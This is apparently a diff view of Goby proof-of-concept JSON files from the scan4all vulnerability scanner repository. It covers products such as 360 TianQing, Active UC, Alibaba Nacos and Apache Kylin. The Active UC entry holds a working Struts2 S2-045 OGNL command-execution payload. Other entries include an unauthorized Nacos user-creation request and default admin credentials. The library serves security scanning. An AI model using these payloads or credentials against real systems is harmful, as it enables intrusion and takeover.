STRLCPY/scan4all

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/360_TianQing_ccid_SQL_injectable.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "360 TianQing ccid SQL injectable",
3	3		"Level": "2",
4		-	"Tags": [
5		-	"sqli"
6		-	],
	4	+	"Tags": [],
7	5		"GobyQuery": "app=\"360-TianQing\"",
8		-	"Description": "",
	6	+	"Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
9	7		"Product": "360 TianQing",
10		-	"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11		-	"Author": "",
12		-	"Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
13		-	"Recommendation": "update",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": null,
17		-	"ExpTips": {
18		-	"Type": "",
19		-	"Content": ""
20		-	},
	8	+	"Homepage": "htp://360.cn",
	9	+	"Author": "PeiQi",
	10	+	"Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
	11	+	"Recommandation": "",
	12	+	"References": [
	13	+	"http://wiki.peiqi.tech"
	14	+	],
21	15		"ScanSteps": [
22	16		"AND",
23	17		{
		skipped 1 lines
25	19		"method": "GET",
26	20		"uri": "/api/dp/rptsvcsyncpoint?ccid=1",
27	21		"follow_redirect": true,
28		-	"header": null,
	22	+	"header": {},
29	23		"data_type": "text",
30	24		"data": ""
31	25		},
		skipped 34 lines
66	60		"SetVariable": []
67	61		}
68	62		],
69		-	"ExploitSteps": [
70		-	"AND",
71		-	{
72		-	"Request": {
73		-	"method": "GET",
74		-	"uri": "/test.php",
75		-	"follow_redirect": true,
76		-	"header": null,
77		-	"data_type": "text",
78		-	"data": "",
79		-	"set_variable": []
80		-	},
81		-	"ResponseTest": {
82		-	"type": "group",
83		-	"operation": "AND",
84		-	"checks": [
85		-	{
86		-	"type": "item",
87		-	"variable": "$code",
88		-	"operation": "==",
89		-	"value": "200",
90		-	"bz": ""
91		-	},
92		-	{
93		-	"type": "item",
94		-	"variable": "$body",
95		-	"operation": "contains",
96		-	"value": "test",
97		-	"bz": ""
98		-	}
99		-	]
100		-	},
101		-	"SetVariable": [
102		-	"output\|lastbody\|regex\|"
103		-	]
104		-	}
105		-	],
106		-	"PostTime": "0000-00-00 00:00:00",
107		-	"GobyVersion": "0.0.0"
	63	+	"PostTime": "2021-04-09 08:51:50",
	64	+	"GobyVersion": "1.8.255"
108	65		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/360_Tianqing_database_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "360 TianQing database information disclosure",
	2	+	"Name": "360 Tianqing database information disclosure",
3	3		"Level": "0",
4	4		"Tags": [
5	5		"Disclosure of Sensitive Information"
6	6		],
7	7		"GobyQuery": "app=\"360-TianQing\"",
8		-	"Description": "",
9		-	"Product": "360 TianQing",
10		-	"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
11		-	"Author": "",
12		-	"Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
13		-	"Recommendation": "update",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": null,
17		-	"ExpTips": {
18		-	"Type": "",
19		-	"Content": ""
20		-	},
	8	+	"Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
	9	+	"Product": "360 Tianqing",
	10	+	"Homepage": "https://www.360.cn/",
	11	+	"Author": "PeiQi",
	12	+	"Impact": "",
	13	+	"Recommandation": "<p>undefined</p>",
	14	+	"References": [
	15	+	"http://wiki.peiqi.tech"
	16	+	],
21	17		"ScanSteps": [
22	18		"AND",
23	19		{
		skipped 1 lines
25	21		"method": "GET",
26	22		"uri": "/api/dbstat/gettablessize",
27	23		"follow_redirect": false,
28		-	"header": null,
	24	+	"header": {},
29	25		"data_type": "text",
30	26		"data": ""
31	27		},
		skipped 34 lines
66	62		"SetVariable": []
67	63		}
68	64		],
69		-	"ExploitSteps": [
70		-	"AND",
71		-	{
72		-	"Request": {
73		-	"method": "GET",
74		-	"uri": "/test.php",
75		-	"follow_redirect": true,
76		-	"header": null,
77		-	"data_type": "text",
78		-	"data": "",
79		-	"set_variable": []
80		-	},
81		-	"ResponseTest": {
82		-	"type": "group",
83		-	"operation": "AND",
84		-	"checks": [
85		-	{
86		-	"type": "item",
87		-	"variable": "$code",
88		-	"operation": "==",
89		-	"value": "200",
90		-	"bz": ""
91		-	},
92		-	{
93		-	"type": "item",
94		-	"variable": "$body",
95		-	"operation": "contains",
96		-	"value": "test",
97		-	"bz": ""
98		-	}
99		-	]
100		-	},
101		-	"SetVariable": [
102		-	"output\|lastbody\|regex\|"
103		-	]
104		-	}
105		-	],
106		-	"PostTime": "0000-00-00 00:00:00",
107		-	"GobyVersion": "0.0.0"
	65	+	"PostTime": "2021-04-08 16:04:28",
	66	+	"GobyVersion": "1.8.255"
108	67		}

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Active_UC_index.action_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Active UC index.action RCE",
	2	+	"Name": "Active UC index.action 远程命令执行漏洞",
3	3		"Level": "3",
4	4		"Tags": [
5	5		"RCE"
6	6		],
7	7		"GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
8		-	"Description": "",
9		-	"Product": "Active UC",
10		-	"Homepage": "http://www.iactive.com.cn/",
11		-	"Author": "",
12		-	"Impact": "Active UC index.action has a RCE vulnerability.",
13		-	"Recommendation": "update",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": [
17		-	{
18		-	"Name": "cmd",
19		-	"Type": "input",
20		-	"Value": "whoami"
21		-	}
	8	+	"Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
	9	+	"Product": "网动统一通信平台(Active UC)",
	10	+	"Homepage": "https://gobies.org/",
	11	+	"Author": "luckying",
	12	+	"Impact": "",
	13	+	"Recommandation": "",
	14	+	"References": [
	15	+	"https://gobies.org/"
22	16		],
23		-	"ExpTips": {
24		-	"Type": "",
25		-	"Content": ""
26		-	},
	17	+	"HasExp": true,
	18	+	"ExpParams": [
	19	+	{
	20	+	"name": "Cmd",
	21	+	"type": "input",
	22	+	"value": "whoami",
	23	+	"show": ""
	24	+	}
	25	+	],
27	26		"ScanSteps": [
28	27		"AND",
29	28		{
		skipped 12 lines
42	41		"Pragma": "no-cache"
43	42		},
44	43		"data_type": "text",
45		-	"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
	44	+	"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
46	45		},
47	46		"ResponseTest": {
48	47		"type": "group",
		skipped 11 lines
60	59		"SetVariable": []
61	60		}
62	61		],
63		-	"ExploitSteps": [
	62	+	"ExploitSteps": [
64	63		"AND",
65	64		{
66	65		"Request": {
		skipped 6 lines
73	72		"Connection": "close",
74	73		"Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
75	74		"Charsert": "UTF-8",
76		-	"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
	75	+	"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
77	76		"Cache-Control": "no-cache",
78	77		"Pragma": "no-cache"
79	78		},
80	79		"data_type": "text",
81		-	"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
	80	+	"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
82	81		},
83	82		"ResponseTest": {
84	83		"type": "group",
		skipped 9 lines
94	93		]
95	94		},
96	95		"SetVariable": [
97		-	"output\|lastbody\|undefined\|undefined"
98		-	]
	96	+	"output\|lastbody"
	97	+	]
99	98		}
100	99		],
101		-	"PostTime": "0000-00-00 00:00:00",
102		-	"GobyVersion": "0.0.0"
	100	+	"PostTime": "2021-06-28 10:08:54",
	101	+	"GobyVersion": "1.8.268"
103	102		}

lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 1 lines
2	2		"Name": "Alibaba Nacos Add user not authorized",
3	3		"Level": "2",
4	4		"Tags": [
5		-	"unauthorized"
	5	+	"Ultra vires"
6	6		],
7		-	"GobyQuery": "title=\"Nacos\"",
8		-	"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
	7	+	"GobyQuery": "title==\"Nacos\"",
	8	+	"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
9	9		"Product": "Alibaba Nacos",
10	10		"Homepage": "https://github.com/alibaba/nacos",
11		-	"Author": "",
12		-	"Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
13		-	"Recommendation": "update",
14		-	"References": [],
	11	+	"Author": "PeiQi",
	12	+	"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
	13	+	"Recommandation": "<p>Upgrade version<br></p>",
	14	+	"References": [
	15	+	"http://wiki.peiqi.tech"
	16	+	],
15	17		"HasExp": true,
16		-	"ExpParams": [
17		-	{
18		-	"Name": "User",
19		-	"Type": "input",
20		-	"Value": "test"
21		-	},
22		-	{
23		-	"Name": "Pass",
24		-	"Type": "input",
25		-	"Value": "test"
26		-	},
27		-	{
28		-	"Name": "Dir",
29		-	"Type": "select",
30		-	"Value": "/v1/auth/users,/nacos/v1/auth/users"
31		-	}
32		-	],
33		-	"ExpTips": {
34		-	"Type": "",
35		-	"Content": ""
36		-	},
	18	+	"ExpParams": [
	19	+	{
	20	+	"name": "User",
	21	+	"type": "input",
	22	+	"value": "PeiQi",
	23	+	"show": ""
	24	+	},
	25	+	{
	26	+	"name": "Pass",
	27	+	"type": "input",
	28	+	"value": "PeiQi",
	29	+	"show": ""
	30	+	},
	31	+	{
	32	+	"name": "Dir",
	33	+	"type": "select",
	34	+	"value": "/v1/auth/users,/nacos/v1/auth/users",
	35	+	"show": ""
	36	+	}
	37	+	],
37	38		"ScanSteps": [
38	39		"OR",
39	40		{
		skipped 49 lines
89	90		"SetVariable": []
90	91		}
91	92		],
92		-	"ExploitSteps": [
	93	+	"ExploitSteps": [
93	94		"AND",
94	95		{
95	96		"Request": {
		skipped 6 lines
102	103		"data_type": "text",
103	104		"data": "username={{{User}}}&password={{{Pass}}}"
104	105		},
105		-	"ResponseTest": {
	106	+	"ResponseTest": {
106	107		"type": "group",
107	108		"operation": "AND",
108	109		"checks": [
		skipped 7 lines
116	117		]
117	118		},
118	119		"SetVariable": [
119		-	"output\|lastbody\|undefined\|undefined"
120		-	]
	120	+	"output\|lastbody"
	121	+	]
121	122		}
122	123		],
123		-	"PostTime": "0000-00-00 00:00:00",
124		-	"GobyVersion": "0.0.0"
	124	+	"PostTime": "2021-04-04 19:56:49",
	125	+	"GobyVersion": "1.8.255"
125	126		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Alibaba_Nacos_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Alibaba Nacos Default Password",
	2	+	"Name": "Alibaba Nacos Default password",
3	3		"Level": "1",
4	4		"Tags": [
5		-	"Default Password"
	5	+	"Default password"
6	6		],
7		-	"GobyQuery": "title=\"Nacos\"",
8		-	"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
	7	+	"GobyQuery": "title==\"Nacos\"",
	8	+	"Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)",
9	9		"Product": "Alibaba Nacos",
10	10		"Homepage": "https://github.com/alibaba/nacos",
11		-	"Author": "",
12		-	"Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).",
13		-	"Recommendation": "",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": null,
17		-	"ExpTips": {
18		-	"Type": "",
19		-	"Content": ""
20		-	},
	11	+	"Author": "PeiQi",
	12	+	"Impact": "<p>Log in to the background to view sensitive information<br></p>",
	13	+	"Recommandation": "<p>Upgrade version</p>",
	14	+	"References": [
	15	+	"http://wiki.peiqi.tech"
	16	+	],
21	17		"ScanSteps": [
22	18		"OR",
23	19		{
		skipped 51 lines
75	71		"SetVariable": []
76	72		}
77	73		],
78		-	"ExploitSteps": [
79		-	"AND",
80		-	{
81		-	"Request": {
82		-	"method": "GET",
83		-	"uri": "/test.php",
84		-	"follow_redirect": true,
85		-	"header": null,
86		-	"data_type": "text",
87		-	"data": "",
88		-	"set_variable": []
89		-	},
90		-	"ResponseTest": {
91		-	"type": "group",
92		-	"operation": "AND",
93		-	"checks": [
94		-	{
95		-	"type": "item",
96		-	"variable": "$code",
97		-	"operation": "==",
98		-	"value": "200",
99		-	"bz": ""
100		-	},
101		-	{
102		-	"type": "item",
103		-	"variable": "$body",
104		-	"operation": "contains",
105		-	"value": "test",
106		-	"bz": ""
107		-	}
108		-	]
109		-	},
110		-	"SetVariable": [
111		-	"output\|lastbody\|regex\|"
112		-	]
113		-	}
114		-	],
115		-	"PostTime": "0000-00-00 00:00:00",
116		-	"GobyVersion": "0.0.0"
	74	+	"PostTime": "2021-04-04 18:56:41",
	75	+	"GobyVersion": "1.8.255"
117	76		}

lib/goby/goby_pocs/Ametys_CMS_infoleak_CVE_2022_26159.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache ActiveMQ Console控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache Cocoon Xml 注入 CVE-2020-11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache Kylin Console 控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache Kylin 未授权配置泄露 CVE-2020-13937.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache Solr任意文件读取漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_APISIX_Dashboard_API_Unauthorized_Access_CVE-2021-45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_APISIX_Dashboard_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_ActiveMQ_Console_Weak_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_ActiveMQ_default_admin_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Apache_Airflow_Unauthorized.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "Apache Airflow Unauthorized",
3		-	"Level": "2",
	3	+	"Level": "3",
4	4		"Tags": [
5	5		"Unauthorized"
6	6		],
7	7		"GobyQuery": "app=\"APACHE-Airflow\"",
8		-	"Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.",
	8	+	"Description": "remote attacker to gain unauthorized access to a targeted system",
9	9		"Product": "APACHE-Airflow",
10	10		"Homepage": "https://airflow.apache.org/",
11		-	"Author": "",
12		-	"Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.",
13		-	"Recommendation": "Restrict public access and upgrade to the latest version of Airflow.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "<p>This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs<br></p>",
	13	+	"Recommendation": "",
14	14		"References": [],
15		-	"HasExp": true,
	15	+	"HasExp": false,
16	16		"ExpParams": null,
17	17		"ExpTips": {
18	18		"Type": "",
		skipped 43 lines
62	62		]
63	63		}
64	64		],
65		-	"ExploitSteps": [
66		-	"AND",
67		-	{
68		-	"Request": {
69		-	"method": "GET",
70		-	"uri": "/test.php",
71		-	"follow_redirect": true,
72		-	"header": null,
73		-	"data_type": "text",
74		-	"data": "",
75		-	"set_variable": []
76		-	},
77		-	"ResponseTest": {
78		-	"type": "group",
79		-	"operation": "AND",
80		-	"checks": [
81		-	{
82		-	"type": "item",
83		-	"variable": "$code",
84		-	"operation": "==",
85		-	"value": "200",
86		-	"bz": ""
87		-	},
88		-	{
89		-	"type": "item",
90		-	"variable": "$body",
91		-	"operation": "contains",
92		-	"value": "test",
93		-	"bz": ""
94		-	}
95		-	]
96		-	},
97		-	"SetVariable": [
98		-	"output\|lastbody\|regex\|"
99		-	]
100		-	}
101		-	],
102		-	"PostTime": "0000-00-00 00:00:00",
103		-	"GobyVersion": "0.0.0"
	65	+	"PostTime": "2021-10-31 15:32:53",
	66	+	"GobyVersion": "1.8.302"
104	67		}

lib/goby/goby_pocs/Apache_Cocoon_XML_Injection_CVE_2020_11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_CouchDB_Remote_Privilege_Escalation_CVE-2017-12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_CouchDB_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE-2021-36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Flink_CVE_2020_17519.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_2.4.50_Path_Traversal_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_RCE_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE-2021-40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(1).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(2).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Apache_Kylin_Console_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Apache Kylin Console default password",
	2	+	"Name": "Apache Kylin Console Default password",
3	3		"Level": "1",
4	4		"Tags": [
5	5		"Default password"
6	6		],
7	7		"GobyQuery": "app=\"APACHE-kylin\"",
8		-	"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
	8	+	"Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console",
9	9		"Product": "Apache Kylin",
10	10		"Homepage": "http://kylin.apache.org/",
11		-	"Author": "",
12		-	"Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.",
13		-	"Recommendation": "",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": null,
17		-	"ExpTips": {
18		-	"Type": "",
19		-	"Content": ""
20		-	},
	11	+	"Author": "PeiQi",
	12	+	"Impact": "<p>The attacker will log into the background as an administrator to further attack</p>",
	13	+	"Recommandation": "<p>undefined</p>",
	14	+	"References": [
	15	+	"http://wiki.peiqi.tech"
	16	+	],
21	17		"ScanSteps": [
22	18		"AND",
23	19		{
		skipped 31 lines
55	51		"SetVariable": []
56	52		}
57	53		],
58		-	"ExploitSteps": [
59		-	"AND",
60		-	{
61		-	"Request": {
62		-	"method": "GET",
63		-	"uri": "/test.php",
64		-	"follow_redirect": true,
65		-	"header": null,
66		-	"data_type": "text",
67		-	"data": "",
68		-	"set_variable": []
69		-	},
70		-	"ResponseTest": {
71		-	"type": "group",
72		-	"operation": "AND",
73		-	"checks": [
74		-	{
75		-	"type": "item",
76		-	"variable": "$code",
77		-	"operation": "==",
78		-	"value": "200",
79		-	"bz": ""
80		-	},
81		-	{
82		-	"type": "item",
83		-	"variable": "$body",
84		-	"operation": "contains",
85		-	"value": "test",
86		-	"bz": ""
87		-	}
88		-	]
89		-	},
90		-	"SetVariable": [
91		-	"output\|lastbody\|regex\|"
92		-	]
93		-	}
94		-	],
95		-	"PostTime": "0000-00-00 00:00:00",
96		-	"GobyVersion": "0.0.0"
	54	+	"PostTime": "2021-04-04 15:51:21",
	55	+	"GobyVersion": "1.8.255"
97	56		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Apache_Kylin_Unauthorized_configuration_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Apache Kylin API Unauthorized Access CVE-2020-13937",
3		-	"Level": "1",
	2	+	"Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)",
	3	+	"Level": "0",
4	4		"Tags": [
5		-	"unauthorized"
	5	+	"Disclosure of Sensitive Information"
6	6		],
7	7		"GobyQuery": "app=\"APACHE-kylin\"",
8		-	"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
	8	+	"Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.",
9	9		"Product": "Apache kylin",
10	10		"Homepage": "http://kylin.apache.org/",
11		-	"Author": "",
